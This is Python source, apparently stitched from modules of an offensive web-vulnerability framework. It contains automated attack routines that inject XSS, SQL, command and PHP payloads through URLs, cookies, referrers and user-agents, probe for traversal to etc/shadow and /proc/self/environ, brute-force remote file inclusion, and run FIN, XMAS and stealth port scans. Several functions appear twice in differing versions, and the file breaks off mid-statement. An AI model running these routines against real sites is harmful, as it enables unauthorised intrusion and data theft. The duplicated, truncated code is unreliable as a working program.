def xssref0x00(web, parallel):
#print(R+'\n ===========================')
print(R + '\n X S S (Referrer Based)')
print(R + ' ---<>----<>----<>----<>----\n')
success = []
if not parallel:
success += refatck(pay, web)
else:
paylists = listsplit(pay, round(len(pay) / processes))
with Pool(processes=processes) as pool:
res = [
pool.apply_async(refatck, args=(
l,
web,
)) for l in paylists
]
for y in res:
i = y.get()
success += i
if success:
data = "XSS Vulnerability (Referrer) found! Payloads :> " + str(
success)
save_data(database, module, lvl1, lvl2, lvl3, name, data)
print(
" [+] XSS Vulnerability (Referrer) found! Successful payloads:"
)
for i in success:
print(i)
else:
data = "(referrer) no payload succeeded."
save_data(database, module, lvl1, lvl2, lvl3, name, data)
print(R + "\n [-] No payload succeeded." + C)
def xsspoly0x00(li, bug2, parallel):
success = []
#print(R+'\n ==========================')
print(R + '\n X S S (Polyglot Fuzzer)')
print(R + ' ——·‹›·––·‹›·——·‹›·——·‹›·––\n')
try:
if '?' in str(li) and '=' in str(li):
if not parallel:
success += polyatck(poly, li, bug2)
else:
paylists = listsplit(poly, round(len(poly) / processes))
with Pool(processes=processes) as pool:
res = [
pool.apply_async(polyatck, args=(
l,
li,
bug2,
)) for l in paylists
]
for y in res:
i = y.get()
success += i
if success:
print(
" [+] XSS Vulnerability (Polyglot) found! Successful payloads:"
)
for i in success:
print(i)
else:
print(R + "\n [-] No payload succeeded." + C)
except KeyboardInterrupt:
print(R + ' [+] Polyglot Payloads File does not exist!')
def atck(evasion, filepath, payloads, web00, bug2, parallel, gen_headers):
gotcha = []
loggy = []
enviro = []
fud = []
generic = []
cnfy = []
if not parallel:
for pay in payloads:
if evasion and filepath != "":
pay = pay.replace("etc/shadow", filepath)
print(GR + '\n [*] Setting parameters...')
web0x00 = web00 + pay + bug2
print(C + ' [+] Using path : ' + B + str(pay))
print(B + ' [+] Url : ' + GR + str(web0x00))
paths = check0x00(web0x00, pay, gen_headers)
gotcha += paths[0]
generic += paths[1]
loggy += paths[2]
enviro += paths[3]
fud += paths[4]
cnfy += paths[5]
else:
print(round(len(payloads) / processes))
paylists = listsplit(payloads, round(len(payloads) / processes))
with Pool(processes=processes) as pool:
res = [
pool.apply_async(chkpre,
args=(
evasion,
filepath,
l,
web00,
bug2,
gen_headers,
)) for l in paylists
]
#res1 = pool.apply_async(portloop, )
for i in res:
paths = i.get()
gotcha += paths[0]
generic += paths[1]
loggy += paths[2]
enviro += paths[3]
fud += paths[4]
cnfy += paths[5]
if gotcha:
print(G +
"\n [+] Retrieved %s interesting paths...\n" % str(len(gotcha)))
time.sleep(0.5)
outto0x00("Logs", loggy)
outto0x00("/proc/self/environ", enviro)
outto0x00("/proc/self/fd", fud)
outto0x00("Configuration", cnfy)
outto0x00("Generic", generic)
else:
print(R + ' [-] No vulnerable paths found!')
def sqliuser0x00(web, parallel):
#print(R+'\n =============================')
print(R+'\n S Q L i (User-Agent Based)')
print(R+' ––·‹›·––·‹›·––·‹›·––·‹›·––·‹›\n')
requests = session()
getrq = requests.get(web, verify=False)
success = []
if not parallel:
for i in pay:
print(B+'\n [*] Using payload : '+C+i)
time.sleep(0.7)
user_agent = {'User-agent': 'Mozilla/5.0 (X11; Ubuntu; Linux' + 'x86_64; rv:39.0) Gecko/20100101 Firefox/39.0'}
user_agent['User-agent'] += str(i)
req = requests.get(web, headers=user_agent, verify=False)
print(O+' [*] Using '+R+'!nfected'+O+' UA : '+GR+user_agent['User-agent'])
if len(req.content) != len(getrq.content):
print(G+' [!] Blind based SQLi (User-Agent Based) Detected!')
print(R+' [!] User-Agent : '+O+user_agent['User-agent'])
else:
paylists = listsplit(pay, round(len(pay)/processes))
with Pool(processes=processes) as pool:
res = [pool.apply_async(userpre, args=(web,l,getrq,)) for l in paylists]
#res1 = pool.apply_async(portloop, )
for i in res:
j = i.get()
success += j
if success:
print(" [+] SQLi Vulnerability (Cookie) found! Successful payloads:")
for i in success:
print(i)
else:
print(R + "\n [-] No payload succeeded."+C)
def xssref0x00(web, parallel):
#print(R+'\n ===========================')
print(R + '\n X S S (Referrer Based)')
print(R + ' ——·‹›·––·‹›·——·‹›·——·‹›·––·\n')
success = []
if not parallel:
success += refatck(pay, web)
else:
paylists = listsplit(pay, round(len(pay) / processes))
with Pool(processes=processes) as pool:
res = [
pool.apply_async(refatck, args=(
l,
web,
)) for l in paylists
]
for y in res:
i = y.get()
success += i
if success:
print(
" [+] XSS Vulnerability (Referrer) found! Successful payloads:"
)
for i in success:
print(i)
else:
print(R + "\n [-] No payload succeeded." + C)
def xsscookie0x00(web, parallel):
#print(R+'\n =======================')
print(R+'\n X S S (Cookie Based)')
print(R+' ——·‹›·––·‹›·——·‹›·——·‹›\n')
sleep(0.5)
vsession = session()
vsession.get(web)
if vsession.cookies:
print(G+' [+] This website supports session cookies...')
success = []
if not parallel:
success += cookieatck(pay, vsession, web)
else:
paylists = listsplit(pay, round(len(pay)/processes))
with Pool(processes=processes) as pool:
res = [pool.apply_async(cookieatck, args=(l,vsession,web,)) for l in paylists]
for y in res:
i = y.get()
success += i
if success:
print(" [+] XSS (Cookie) Vulnerability found! Successful payloads:")
for i in success:
print(i)
else:
print(R + "\n [-] No payload succeeded."+C)
else:
print(R+' [-] No support for cookies...')
time.sleep(0.5)
print(R+' [-] Cookie based injection not possible...')
def manual0x00(web, parallel):
#print(R+'\n ======================')
print(R + '\n X S S (Manual Mode)')
print(R + ' ——·‹›·––·‹›·——·‹›·––·‹\n')
bug = input(O + ' [#] Injectable Endpoint' + R +
' (eg. /xss/search.php?q=drake)' + O + ' :> ')
choice = ""
if "&" in bug:
ln = len(bug.split("&"))
choice = input(
" [!] Discovered {} parameters. Which one to use? (enter name) :> "
.format(ln))
if not choice in bug:
sys.exit(" [-] Param {} not found.".format(choice))
bugs = web + bug.split(choice + '=')[0] + choice + '='
bug2 = ""
if choice != "":
n = bug.split(choice + "=")[1]
if "&" in n:
bug2 = bug.split(choice)[1]
tmp = bug2.split("&")[0]
bug2 = bug2.replace(tmp, "")
print(O + ' [!] Using Url : ' + GR + bugs + "INJECT" + bug2)
if '?' in str(bugs) and '=' in str(bugs):
success = []
if not parallel:
manualatck(pay, bugs, bug2)
else:
paylists = listsplit(pay, round(len(pay) / processes))
with Pool(processes=processes) as pool:
res = [
pool.apply_async(manualatck, args=(
l,
bugs,
bug2,
)) for l in paylists
]
for y in res:
i = y.get()
success += i
if success:
print(" [+] XSS Vulnerability found! Successful payloads:")
for i in success:
print(i)
else:
print(R + "\n [-] No payload succeeded." + C)
x = input(O + ' [#] Test Polyglots? (Y/n) :> ')
if x == 'Y' or x == 'y':
print(GR + ' [*] Proceeding fuzzing with polyglots...')
xsspoly0x00(bugs, bug2, parallel)
elif x == 'n' or x == 'N':
print(C + ' [+] Okay!')
else:
print(GR + ' [-] U high dude?')
else:
print(R + ' [-] Enter an URL with scope parameter...')
manual0x00(web, parallel)
def sqlicookie0x00(web, parallel):
#print(R+'\n =========================')
print(R + '\n S Q L i (Cookie Based)')
print(R + ' ––·‹›·––·‹›·––·‹›·––·‹›·–\n')
sleep(0.5)
vsession = session()
req = vsession.get(web)
check = ["have an error", "SQL syntax", "MySQL"]
if vsession.cookies:
print(G + ' [+] This website values session cookies...')
success = []
if not parallel:
for i in pay:
print(B + " [*] Trying Payload : " + C + '' + i)
time.sleep(0.7)
for cookie in vsession.cookies:
cookie.value += i
print(O + ' [+] Using ' + R + '!nfected' + O +
' cookie : ' + GR + cookie.value)
r = vsession.get(web)
for j in range(0, len(check)):
if check[j] in r.text:
poc = C + " [+] PoC : " + O + cookie.name + " : " + GR + cookie.value
print(
G +
" [+] Error Based SQli (Cookie Based) Detected! "
)
print(poc)
print(P + ' [+] Code : ' + W + str(r.text) +
'\n')
success.append(i)
else:
paylists = listsplit(pay, round(len(pay) / processes))
with Pool(processes=processes) as pool:
res = [
pool.apply_async(cookiepre,
args=(
l,
vsession,
check,
req,
)) for l in paylists
]
#res1 = pool.apply_async(portloop, )
for i in res:
j = i.get()
success += j
if success:
print(" [+] SQLi Vulnerability found! Successful payloads:")
for i in success:
print(i)
else:
print(R + "\n [-] No payload succeeded." + C)
else:
print(R + ' [-] No support for cookies...')
time.sleep(0.5)
print(R + ' [-] Cookie based injection not possible...')
def manual0x00(web, parallel):
#print(R+'\n ========================')
print(R+'\n S Q L i (Manual Mode)')
print(R+' ––·‹›·––·‹›·––·‹›·––·‹›·\n')
requests = session()
bug = input(O+' [#] Injectable Endpoint'+R+' (eg. /sqli/fetch.php?id=x)'+O+' :> ')
choice = ""
if "&" in bug:
ln = len(bug.split("&"))
choice = input(" [!] Discovered {} parameters. Which one to use? (enter name) :> ".format(ln))
if not choice in bug:
sys.exit(" [-] Param {} not found.".format(choice))
bug2 = ""
param1 = ""
if choice != "":
n = bug.split(choice + "=")[1]
if "&" in n:
bug2 = bug.split(choice+"=")[1]
param1 = bug2.split("&")[0]
bug2 = bug2.replace(param1,"")
bugs = web + bug.split(choice + '=')[0] + choice + '=' + param1
print(O+' [!] Using Url : '+GR+bugs)
if '?' in str(bugs) and '=' in str(bugs):
success = []
if not parallel:
for p in pay:
bugged = bugs + str(p) + bug2
print(B+" [*] Trying : "+C+bugged)
time.sleep(0.7)
response = requests.get(bugged).text
if (('error' in response) and ('syntax' in response) and ('SQL' in response) or ('Warning:' in response)):
print('\n'+G+' [+] Vulnerable link detected : ' + bugged)
print(GR+' [*] Injecting payloads...')
print(B+' [!] PoC : ' + str(bugged))
print(R+" [!] Payload : " + O + p + '\033[0m')
print("\033[1m [!] Code Snippet :\n \033[0m" + str(response) + '\n')
else:
paylists = listsplit(pay, round(len(pay)/processes))
with Pool(processes=processes) as pool:
res = [pool.apply_async(manualpre, args=(l,bugs,bug2,)) for l in paylists]
#res1 = pool.apply_async(portloop, )
for i in res:
j = i.get()
success += j
if success:
print(" [+] SQLi Vulnerability found! Successful payloads:")
for i in success:
print(i)
else:
print(R + "\n [-] No payload succeeded."+C)
else:
print(R+' [-] Enter an URL with scope parameter...')
manual0x00(web, parallel)
def sqliuser0x00(web, parallel):
#print(R+'\n =============================')
print(R + '\n S Q L i (User-Agent Based)')
print(R + ' ---<>----<>----<>----<>----<>\n')
success = []
requests = session()
if not parallel:
for i in pay:
print(B + ' [*] Using payload : ' + C + i)
time.sleep(0.7)
user_agent = {
'User-agent':
'Mozilla/5.0 (X11; Ubuntu; Linux' +
'x86_64; rv:39.0) Gecko/20100101 Firefox/39.0'
}
user_agent['User-agent'] += i
req = requests.get(web, headers=user_agent)
print(O + ' [*] Using ' + R + '!nfected' + O + ' UA : ' + GR +
user_agent['User-agent'])
#flag = u' '.join(req.text).encode('utf-8').strip()
flag = " ".join(req.text).strip()
if 'error' in flag or 'syntax' in flag or 'MySQL'.lower(
) in flag.lower():
print(
G +
'\n [!] Error based SQLi (User-Agent Based) Detected!')
print(R + ' [!] User-Agent : ' + O +
user_agent['User-agent'])
success.append(i)
else:
paylists = listsplit(pay, round(len(pay) / processes))
with Pool(processes=processes) as pool:
res = [
pool.apply_async(userpre, args=(
l,
web,
)) for l in paylists
]
#res1 = pool.apply_async(portloop, )
for i in res:
j = i.get()
success += j
if success:
data = "SQLi Vulnerability (useragent) found!\nSuccessful payloads: " + str(
success)
save_data(database, module, lvl1, lvl2, lvl3, name, data)
print(
" [+] SQLi Vulnerability (useragent) found! Successful payloads:"
)
for i in success:
print(i)
else:
print(R + "\n [-] No payload succeeded." + C)
save_data(database, module, lvl1, lvl2, lvl3, name,
"(useragent) no payload succeeded.")
def brute0x00(web, parallel):
try:
if properties["DICT"][1] == " ":
print(O + ' [!] Enter path to payload file ' + R +
'(Default: files/fuzz-db/rfi_paths.lst)')
fi = input(O + ' [§] Your input (Press Enter if default) :> ')
elif properties["DICT"][1].lower() == "none":
fi = ""
else:
fi = properties["DICT"][1]
if fi == '':
fi = 'files/fuzz-db/rfi_paths.lst'
print(GR + ' [*] Importing wordlist...')
if os.path.exists(fi) == True:
print(G + ' [+] File path found!')
time.sleep(0.6)
print(O + ' [*] Importing wordlist...')
with open(fi, 'r') as wew:
for w in wew:
w = w.strip('\n')
payloads.append(w)
print(GR + ' [*] Starting bruteforce...')
time.sleep(0.7)
success = []
if not parallel:
success += checkbrute(payloads, web)
else:
paylists = listsplit(payloads,
round(len(payloads) / processes))
with Pool(processes=processes) as pool:
res = [
pool.apply_async(checkbrute, args=(
l,
web,
)) for l in paylists
]
for y in res:
i = y.get()
success += i
if success:
data = "Possible RFI at: " + str(success)
save_data(database, module, lvl1, lvl2, lvl3, name, data)
print(" [+] Remote File Inclusion found! Successful payloads:")
for i in success:
print(i)
else:
print(R + "\n [-] No payload succeeded." + C)
save_data(database, module, lvl1, lvl2, lvl3, name,
"(brute) no payload succeeded.")
except Exception as e:
print(R + ' [-] Unexpected Exception Encountered!')
print(R + ' [-] Exception : ' + str(e))
def getPayloads(url, parallel):
if properties["DICT"][1] == " ":
print(O + ' [!] Enter path to payload file ' + R +
'(Default: files/payload-db/rce_payloads.lst)')
fi = input(O + ' [§] Your input (Press Enter if default) :> ')
elif properties["DICT"][1].lower() == "none":
fi = ""
else:
fi = properties["DICT"][1]
if fi == '':
fi = 'files/payload-db/rce_payloads.lst'
print(GR + ' [*] Loading payloads...')
time.sleep(0.8)
try:
with open(fi) as run:
for p in run:
p = p.replace('\n', '')
p = r'%s' % p
payloads.append(p)
except Exception as e:
print(R + ' [-] Exception: ' + str(e))
print(G + ' [+] ' + str(len(payloads) + 1) + ' Payloads loaded!')
check = re.compile(
"51107ed95250b4099a0f481221d56497|Linux|eval\(\)|SERVER_ADDR|Volume.+Serial|\[boot|root|x:bin",
re.I)
print(GR + ' [*] Starting command injection testing...')
success = []
if not parallel:
check0x00(url, payloads, check)
else:
paylists = listsplit(payloads, round(len(payloads) / processes))
with Pool(processes=processes) as pool:
res = [
pool.apply_async(check0x00, args=(
url,
l,
check,
)) for l in paylists
]
for y in res:
i = y.get()
success += i
if success:
print(" [+] CMDi Vulnerability found! Successful payloads:")
for i in success:
print(i)
else:
print(R + "\n [-] No payload succeeded." + C)
def xsscookie0x00(web, parallel):
#print(R+'\n =======================')
print(R + '\n X S S (Cookie Based)')
print(R + ' ---<>----<>----<>----<>\n')
sleep(0.5)
vsession = session()
vsession.get(web)
if vsession.cookies:
print(G + ' [+] This website supports session cookies...')
success = []
if not parallel:
success += cookieatck(pay, vsession, web)
else:
paylists = listsplit(pay, round(len(pay) / processes))
with Pool(processes=processes) as pool:
res = [
pool.apply_async(cookieatck, args=(
l,
vsession,
web,
)) for l in paylists
]
for y in res:
i = y.get()
success += i
if success:
data = "XSS Vulnerability (Cookie) found! Payloads :> " + str(
success)
save_data(database, module, lvl1, lvl2, lvl3, name, data)
print(
" [+] XSS (Cookie) Vulnerability found! Successful payloads:"
)
for i in success:
print(i)
else:
data = "(cookie) no payload succeeded."
save_data(database, module, lvl1, lvl2, lvl3, name, data)
print(R + "\n [-] No payload succeeded." + C)
else:
print(R + ' [-] No support for cookies...')
time.sleep(0.5)
print(R + ' [-] Cookie based injection not possible...')
data = "No support for cookies. Cookie based injection not possible."
save_data(database, module, lvl1, lvl2, lvl3, name, data)
def scan0x00(target):
try:
from core.methods.print import pscan
pscan("fin scan")
#print(''+R+'\n =================')
#print(''+R + ' F I N S C A N ')
#print(''+R + ' =================')
print(''+R + ' [Reliable only in LA Networks]\n')
if properties["INIT"][1] == " ":
min_port = input(C+' [§] Enter initial port :> ')
else:
min_port = properties["INIT"][1]
if properties["FIN"][1] == " ":
max_port = input(C+' [§] Enter ending port :> ')
else:
max_port = properties["FIN"][1]
openfil_ports = []
filter_ports = []
closed_ports = []
ip_host = socket.gethostbyname(target)
if properties["VERBOSE"][1] == " ":
chk = input(C+' [?] Do you want a verbose output? (enter if not) :> ')
verbose = chk != ""
else:
verbose = properties["VERBOSE"][1] == "1"
try:
print(GR+' [*] Checking port range...')
if int(min_port) >= 0 and int(max_port) >= 0 and int(max_port) >= int(min_port) and int(max_port) <= 65536:
print(P+' [!] Port range detected valid...'+C)
time.sleep(0.3)
print(GR+' [*] Preparing for the the FIN Scan...')
pass
else: # If range didn't raise error, but didn't meet criteria
print(R+"\n [!] Invalid Range of Ports")
print(R+" [!] Exiting...")
quit()
except Exception: # If input range raises an error
print(R+"\n [!] Invalid Range of Ports")
print(R+" [!] Exiting...")
quit()
ports = range(int(min_port), int(max_port)+1) # Build range from given port numbers
starting_time = time.time() # Start clock for scan time
checkhost(ip_host) # Run checkhost() function from earlier
print(G+" [!] Scanning initiated at " + strftime("%H:%M:%S") + "!"+C+color.TR2+C+"\n") # Confirm scan start
prtlst = listsplit(ports, round(len(ports)/processes))
with Pool(processes=processes) as pool:
res = [pool.apply_async(portloop, args=(l,verbose,ip_host,)) for l in prtlst]
#res1 = pool.apply_async(portloop, )
for i in res:
j = i.get()
openfil_ports += j[0]
closed_ports += j[1]
filter_ports += j[2]
print(G+"\n [!] Scanning completed at %s" %(time.strftime("%I:%M:%S %p"))+C+color.TR2+C)
ending_time = time.time()
total_time = ending_time - starting_time
print(P+' [*] Preparing report...\n'+C)
time.sleep(1)
openports = " {}{}{}{}{}{}{}{} ports open.".format(color.TR5,C, G, str(len(openfil_ports)), color.END, color.TR2, color.END, color.CURSIVE)
summary("finscan", openports)
print()
print(P+' +--------+------------------+')
print(P+' | '+C+'PORT '+P+'| '+C+'STATE '+P+'|')
print(P+' +--------+------------------+')
if openfil_ports:
for i in sorted(openfil_ports):
c = str(i)
if len(c) == 1:
print(P+' | '+C+c+P+' | '+C+'OPEN '+P+'|')
print(P+' +--------+------------------+')
time.sleep(0.2)
elif len(c) == 2:
print(P+' | '+C+c+' '+P+'| '+C+'OPEN '+P+'|')
print(P+' +--------+------------------+')
time.sleep(0.2)
elif len(c) == 3:
print(P+' | '+C+c+' '+P+'| '+C+'OPEN '+P+'|')
print(P+' +--------+------------------+')
time.sleep(0.2)
elif len(c) == 4:
print(P+' | '+C+c+' '+P+'| '+C+'OPEN '+P+'|')
print(P+' +--------+------------------+')
time.sleep(0.2)
elif len(c) == 5:
print(P+' | '+C+c+' '+P+'| '+C+'OPEN '+P+'|')
print(P+' +--------+------------------+')
time.sleep(0.2)
data = "Open Ports: " + str(openfil_ports)
save_data(database, module, lvl1, lvl2, lvl3, name, data)
if filter_ports:
for i in sorted(filter_ports):
c = str(i)
if len(c) == 1:
print(P+' | '+C+c+P+' | '+C+'FILTERED '+P+'|')
print(P+' +--------+------------------+')
time.sleep(0.2)
elif len(c) == 2:
print(P+' | '+C+c+' '+P+'| '+C+'FILTERED '+P+'|')
print(P+' +--------+------------------+')
time.sleep(0.2)
elif len(c) == 3:
print(P+' | '+C+c+' '+P+'| '+C+'FILTERED '+P+'|')
print(P+' +--------+------------------+')
time.sleep(0.2)
elif len(c) == 4:
print(P+' | '+C+c+' '+P+'| '+C+'FILTERED '+P+'|')
print(P+' +--------+------------------+')
time.sleep(0.2)
elif len(c) == 5:
print(P+' | '+C+c+' '+P+'| '+C+'FILTERED '+P+'|')
print(P+' +--------+------------------+')
time.sleep(0.2)
data = "Filtered Ports: " + str(filter_ports)
save_data(database, module, lvl1, lvl2, lvl3, name, data)
print('')
else:
print(''+R+" [-] No open/filtered ports found.!!"+'')
save_data(database, module, lvl1, lvl2, lvl3, name, "No open/filtered ports found.")
print(B+"\n [!] " + str(len(closed_ports)) + ' closed ports not shown')
print(G+" [+] Host %s scanned in %s seconds" %(target, total_time)+C+color.TR2+C+"\n")
except KeyboardInterrupt:
print(R+"\n [-] User Requested Shutdown...")
print(" [*] Exiting...")
quit()
def scan0x00(target):
try:
#print(R+'\n ===================')
#print(R+' X M A S S C A N ')
#print(R+' ===================\n')
from core.methods.print import pscan
pscan("xmas scan")
print(R + ' [Reliable only in LA Networks]\n')
min_port = input(O + " [#] Enter Minumum Port Number -> ")
max_port = input(O + " [#] Enter Maximum Port Number -> ")
openfil_ports = []
filter_ports = []
closed_ports = []
ip_host = socket.gethostbyname(target)
chk = input(C +
' [#] Do you want a verbose output? (enter if not) :> ')
verbose = chk is not ""
try:
print(GR + ' [*] Checking port range...')
if int(min_port) >= 0 and int(max_port) >= 0 and int(
max_port) >= int(min_port) and int(max_port) <= 65536:
print(G + '\033[1;32m [+] Port range detected valid...')
time.sleep(0.3)
print(GR + ' [*] Preparing for the the FIN Scan...')
pass
else:
print(R + "\n [!] Invalid Range of Ports")
print(" [!] Exiting...")
quit()
except Exception: # If input range raises an error
print("\n\033[91m [!] Invalid Range of Ports")
print(" [!] Exiting...")
quit()
ports = range(int(min_port),
int(max_port) + 1) # Build range from given port numbers
prtlst = listsplit(ports, round(len(ports) / processes))
starting_time = time.time() # Start clock for scan time
SYNACK = 0x12 # Set flag values for later reference
RSTACK = 0x14
def checkhost(ip): # Function to check if target is up
conf.verb = 0 # Hide output
try:
ping = sr1(IP(dst=ip) / ICMP()) # Ping the target
print("\n\033[1;32m [!] Target server detected online...")
time.sleep(0.6)
print(' [*] Beginning scan...')
except Exception: # If ping fails
print("\n\033[91m [!] Couldn't Resolve Target")
print(" [!] Exiting...")
quit()
checkhost(ip_host) # Run checkhost() function from earlier
print(G + " [*] Scanning initiated at " + strftime("%H:%M:%S") +
"!\n") # Confirm scan start
with Pool(processes=processes) as pool:
res = [
pool.apply_async(portloop, args=(
l,
verbose,
ip_host,
)) for l in prtlst
]
#res1 = pool.apply_async(portloop, )
for i in res:
j = i.get()
openfil_ports += j[0]
filter_ports += j[1]
closed_ports += j[2]
print("\n [!] Scanning completed at %s" %
(time.strftime("%I:%M:%S %p")))
ending_time = time.time()
total_time = ending_time - starting_time
print(GR + ' [*] Preparing report...\n')
time.sleep(1)
#print(O+' +-------------+')
#print(O+' | '+R+'SCAN REPORT '+O+'|')
print(O + ' ' + R + 'SCAN REPORT ' + O + ' ')
#print(O+' +-------------+')
print(O + ' ––·‹›·––·‹›·–––')
#print(O+' |')
print()
print(O + ' +--------+------------------+')
print(O + ' | ' + GR + 'PORT ' + O + '| ' + GR +
'STATE ' + O + '|')
print(O + ' +--------+------------------+')
if openfil_ports:
for i in sorted(openfil_ports):
c = str(i)
if len(c) == 1:
print(O + ' | ' + C + c + O + ' | ' + G +
'OPEN ' + O + '|')
print(O + ' +--------+------------------+')
time.sleep(0.2)
elif len(c) == 2:
print(O + ' | ' + C + c + ' ' + O + '| ' + G +
'OPEN ' + O + '|')
print(O + ' +--------+------------------+')
time.sleep(0.2)
elif len(c) == 3:
print(O + ' | ' + C + c + ' ' + O + '| ' + G +
'OPEN ' + O + '|')
print(O + ' +--------+------------------+')
time.sleep(0.2)
elif len(c) == 4:
print(O + ' | ' + C + c + ' ' + O + '| ' + G +
'OPEN ' + O + '|')
print(O + ' +--------+------------------+')
time.sleep(0.2)
elif len(c) == 5:
print(O + ' | ' + C + c + ' ' + O + '| ' + G +
'OPEN ' + O + '|')
print(O + ' +--------+------------------+')
time.sleep(0.2)
if filter_ports:
for i in sorted(filter_ports):
c = str(i)
if len(c) == 1:
print(O + ' | ' + C + c + O + ' | ' + GR +
'FILTERED ' + O + '|')
print(O + ' +--------+------------------+')
time.sleep(0.2)
elif len(c) == 2:
print(O + ' | ' + C + c + ' ' + O + '| ' + GR +
'FILTERED ' + O + '|')
print(O + ' +--------+------------------+')
time.sleep(0.2)
elif len(c) == 3:
print(O + ' | ' + C + c + ' ' + O + '| ' + GR +
'FILTERED ' + O + '|')
print(O + ' +--------+------------------+')
time.sleep(0.2)
elif len(c) == 4:
print(O + ' | ' + C + c + ' ' + O + '| ' + GR +
'FILTERED ' + O + '|')
print(O + ' +--------+------------------+')
time.sleep(0.2)
elif len(c) == 5:
print(O + ' | ' + C + c + ' ' + O + '| ' + GR +
'FILTERED ' + O + '|')
print(O + ' +--------+------------------+')
time.sleep(0.2)
else:
print('' + R + " [-] No filtered ports found.!!" + O + '')
print(B + "\n [!] " + str(len(closed_ports)) +
' closed ports not shown')
print(O + " [!] Host %s scanned in %s seconds\n" %
(target, total_time))
except KeyboardInterrupt: # In case the user wants to quit
print("\n\033[91m [*] User Requested Shutdown...")
print(" [*] Exiting...")
quit()
def scan0x00(target):
try:
#print(R+'\n =================================')
#print(R+' T C P S T E A L T H S C A N ')
#print(R+' =================================\n')
from core.methods.print import pscan
pscan("tcp stealth scan")
if properties["INIT"][1] == " ":
min_port = input(O + ' [#] Enter initial port :> ')
else:
min_port = properties["INIT"][1]
if properties["FIN"][1] == " ":
max_port = input(O + ' [#] Enter ending port :> ')
else:
max_port = properties["FIN"][1]
open_ports = []
closed_ports = []
ip_host = socket.gethostbyname(target)
if properties["VERBOSE"][1] == " ":
chk = input(
C + ' [#] Do you want a verbose output? (enter if not) :> ')
verbose = chk is not ""
else:
verbose = properties["VERBOSE"][1] == "1"
try:
print(GR + ' [*] Checking port range...')
if int(min_port) >= 0 and int(max_port) >= 0 and int(
max_port) >= int(min_port) and int(max_port) <= 65536:
print('\033[1;32m [!] Port range detected valid...')
time.sleep(0.3)
print(GR + ' [*] Preparing for the the Scan...')
pass
else:
print("\n\033[91m [!] Invalid Range of Ports")
print(" [!] Exiting...")
quit()
except Exception:
print("\n\033[91m [!] Invalid Range of Ports")
print(" [!] Exiting...")
quit()
ports = range(int(min_port), int(max_port) + 1)
prtlst = listsplit(ports, round(len(ports) / processes))
starting_time = time.time()
SYNACK = 0x12
RSTACK = 0x14
checkhost(target)
print(O + " [*] Scanning initiated at " + strftime("%H:%M:%S") + "!\n")
with Pool(processes=processes) as pool:
res = [
pool.apply_async(portloop, args=(
l,
verbose,
ip_host,
)) for l in prtlst
]
#res1 = pool.apply_async(portloop, )
for i in res:
j = i.get()
open_ports += j[0]
closed_ports += j[1]
print(O + "\n [!] Scanning completed at %s" %
(time.strftime("%I:%M:%S %p")))
ending_time = time.time()
total_time = ending_time - starting_time
print(GR + ' [*] Preparing report...\n')
time.sleep(1)
print(O + ' ——·+-------------+')
print(O + ' [ SCAN REPORT ] stealthscan')
print(O + ' +-------------+ --------------')
print(O + ' ')
print(O + ' +--------+------------------+')
print(O + ' | ' + GR + 'PORT ' + O + '| ' + GR +
'STATE ' + O + '|')
print(O + ' +--------+------------------+')
if open_ports:
for i in sorted(open_ports):
c = str(i)
if len(c) == 1:
print(O + ' | ' + C + c + O + ' | ' + G +
'OPEN ' + O + '|')
print(O + ' +--------+------------------+')
time.sleep(0.2)
elif len(c) == 2:
print(O + ' | ' + C + c + ' ' + O + '| ' + G +
'OPEN ' + O + '|')
print(O + ' +--------+------------------+')
time.sleep(0.2)
elif len(c) == 3:
print(O + ' | ' + C + c + ' ' + O + '| ' + G +
'OPEN ' + O + '|')
print(O + ' +--------+------------------+')
time.sleep(0.2)
elif len(c) == 4:
print(O + ' | ' + C + c + ' ' + O + '| ' + G +
'OPEN ' + O + '|')
print(O + ' +--------+------------------+')
time.sleep(0.2)
elif len(c) == 5:
print(O + ' | ' + C + c + ' ' + O + '| ' + G +
'OPEN ' + O + '|')
print(O + ' +--------+------------------+')
time.sleep(0.2)
else:
print('' + R + " [-] Sorry, No open ports found.!!")
print(O + '\n [!] ' + str(len(closed_ports)) +
' closed ports not shown')
print(C + " [!] Host %s scanned in %s seconds" % (target, total_time))
except KeyboardInterrupt:
print(R + "\n [-] User Requested Shutdown...")
print(" [*] Exiting...")
quit()
def phpi(web):
global name
name = targetname(web)
global lvl2
lvl2 = inspect.stack()[0][3]
global module
module = "VulnAnalysis"
global lvl1
lvl1 = "Critical Vulnerabilities"
global lvl3
lvl3 = ""
time.sleep(0.5)
#print(R+'\n =====================================')
#print(R+'\n P H P C O D E I N J E C T I O N')
#print(R+' ---<>----<>----<>----<>----<>----<>--\n')
from core.methods.print import pvln
pvln("php code Injection")
gen_headers = {
'User-Agent':
'Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201',
'Accept-Language': 'en-US;',
'Accept-Encoding': 'gzip, deflate',
'Accept':
'text/php, application/xhtml+xml, application/xml;', # important -> text/php
'Connection': 'close'
}
print(GR + ' [*] Initiating ' + R + 'Parameter Based Check...')
if properties["PARAM"][1] == " ":
param = input(O +
' [§] Scope parameter (eg. /vuln/page.php?q=lmao) :> ')
else:
param = properties["PARAM"][1]
if param.startswith('/') == False:
param = '/' + param
choice = ""
if "&" in param:
ln = len(param.split("&"))
choice = input(
" [!] Discovered {} parameters. Which one to use? (enter name) :> "
.format(ln))
if not choice in param:
sys.exit(" [-] Param {} not found.".format(choice))
bug2 = ""
if choice != "":
n = param.split(choice + "=")[1]
if "&" in n:
bug2 = param.split(choice)[1]
tmp = bug2.split("&")[0]
bug2 = bug2.replace(tmp, "")
if properties["PARALLEL"][1] == " ":
pa = input("\n [?] Parallelise Attack? (enter if not) :> ")
parallel = pa != ""
else:
parallel = properties["PARALLEL"][1] == "1"
getFile0x00() # get the file with payloads
web00 = web + param.split(choice + '=')[0] + choice + '='
try:
success = []
if not parallel:
for pay in payloads:
print(GR + '\n [*] Setting parameters...')
web0x00 = web00 + pay + bug2
print(C + ' [+] Using payload : ' + B + str(pay))
print(B + ' [+] Using !nfected Url : ' + GR +
str(web0x00)) # display whats going on
success += check0x00(
web0x00, pay, gen_headers) # check the outupt of the fuzz
else:
paylists = listsplit(payloads, round(len(payloads) / processes))
with Pool(processes=processes) as pool:
res = [
pool.apply_async(checkpre,
args=(
l,
web00,
bug2,
gen_headers,
)) for l in paylists
]
for y in res:
i = y.get()
success += i
if success:
data = "CRLF Injection Vulnerability found!\nVulnerable param: " + web00 + "\nPayloads: " + str(
success)
save_data(database, module, lvl1, lvl2, lvl3, name, data)
print(" [+] PHPi Vulnerability found! Successful payloads:")
for i in success:
print(i)
else:
print(R + "\n [-] No payload succeeded." + C)
save_data(database, module, lvl1, lvl2, lvl3, name,
